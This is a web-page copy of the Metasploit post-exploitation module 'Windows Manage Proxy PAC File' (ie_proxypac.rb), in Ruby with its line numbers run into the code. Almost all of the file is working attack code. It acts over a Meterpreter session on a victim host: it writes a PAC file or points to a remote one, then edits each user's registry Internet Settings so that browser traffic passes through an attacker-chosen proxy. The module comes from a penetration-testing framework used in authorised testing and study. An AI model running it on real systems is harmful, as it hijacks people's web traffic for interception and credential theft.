Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/manage/ie_proxypac.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Priv7include Msf::Post::File8include Msf::Post::Windows::Registry910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Windows Manage Proxy PAC File',15'Description' => %q{16This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC17option, a PAC file will be created on the victim host. It's also possible to provide a18remote PAC file (REMOTE_PAC option) by providing the full URL.19},20'License' => MSF_LICENSE,21'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],22'References' => [23[ 'URL', 'https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1' ],24[ 'URL', 'http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry' ]25],26'Platform' => 'win',27'SessionTypes' => [ 'meterpreter' ],28'Compat' => {29'Meterpreter' => {30'Commands' => %w[31stdapi_sys_config_getenv32]33}34}35)36)3738register_options(39[40OptPath.new('LOCAL_PAC', [false, 'Local PAC file.' ]),41OptString.new('REMOTE_PAC', [false, 'Remote PAC file. (Ex: http://192.168.1.20/proxy.pac)' ]),42OptBool.new('DISABLE_PROXY', [true, 'Disable the proxy server.', false]),43OptBool.new('AUTO_DETECT', [true, 'Automatically detect settings.', false])44]45)46end4748def run49if datastore['LOCAL_PAC'].blank? && datastore['REMOTE_PAC'].blank?50print_error('You must set a remote or local PAC file. Aborting...')51return52end5354if datastore['REMOTE_PAC']55@remote = true56print_status('Setting automatic configuration script from a remote PAC file ...')57res = enable_proxypac(datastore['REMOTE_PAC'])58else59@remote = false60print_status('Setting automatic configuration script from local PAC file ...')61pac_file = create_pac(datastore['LOCAL_PAC'])62unless pac_file63print_error('There were problems creating the PAC proxy file. Aborting...')64return65end66res = enable_proxypac(pac_file)67end68unless res69print_error('Error while setting an automatic configuration script. Aborting...')70return71end7273print_good('Automatic configuration script configured...')7475if datastore['AUTO_DETECT']76print_status('Enabling Automatically Detect Settings...')77unless auto_detect_on78print_error('Failed to enable Automatically Detect Settings. Proceeding anyway...')79end80end8182if datastore['DISABLE_PROXY']83print_status('Disabling the Proxy Server...')84unless disable_proxy85print_error('Failed to disable Proxy Server. Proceeding anyway...')86end87end88end8990def create_pac(local_pac)91pac_file = session.sys.config.getenv('APPDATA') << '\\' << Rex::Text.rand_text_alpha((rand(6..13))) << '.pac'92conf_pac = ''9394if ::File.exist?(local_pac)95conf_pac << ::File.open(local_pac, 'rb').read96else97print_error('Local PAC file not found.')98return false99end100101if write_file(pac_file, conf_pac)102print_status("PAC proxy configuration file written to #{pac_file}")103return pac_file104else105return false106end107end108109def enable_proxypac(pac)110proxy_pac_enabled = false111112registry_enumkeys('HKU').each do |k|113next unless k.include? 'S-1-5-21'114next if k.include? '_Classes'115116key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings"117value_auto = 'AutoConfigURL'118file = @remote ? pac.to_s : "file://#{pac}"119120begin121res = registry_setvaldata(key, value_auto, file, 'REG_SZ')122rescue ::RuntimeError, Rex::TimeoutError123next124end125126if res.nil? # Rex::Post::Meterpreter::RequestError127next128end129130if change_connection(16, '05', key + '\\Connections')131proxy_pac_enabled = true132end133end134135if proxy_pac_enabled136return true137else138return false139end140end141142def auto_detect_on143auto_detect_enabled = false144145registry_enumkeys('HKU').each do |k|146next unless k.include? 'S-1-5-21'147next if k.include? '_Classes'148149key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings\\Connections"150if change_connection(16, '0D', key)151print_good('Automatically Detect Settings on.')152auto_detect_enabled = true153end154end155156if auto_detect_enabled157return true158else159return false160end161end162163def disable_proxy164value_enable = 'ProxyEnable'165profile = false166167registry_enumkeys('HKU').each do |k|168next unless k.include? 'S-1-5-21'169next if k.include? '_Classes'170171key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings"172begin173registry_setvaldata(key, value_enable, 0, 'REG_DWORD')174profile = true175rescue ::RuntimeError, Rex::TimeoutError176next177end178end179180if profile181print_good('Proxy disabled.')182return true183else184return false185end186end187188def change_connection(offset, value, key)189value_default = 'DefaultConnectionSettings'190begin191value_con = registry_getvaldata(key, value_default)192binary_data = value_con.unpack('H*')[0]193binary_data[offset, 2] = value194registry_setvaldata(key, value_default, ['%x' % binary_data.to_i(16)].pack('H*'), 'REG_BINARY')195rescue ::RuntimeError, Rex::TimeoutError196return false197end198199return true200end201end202203204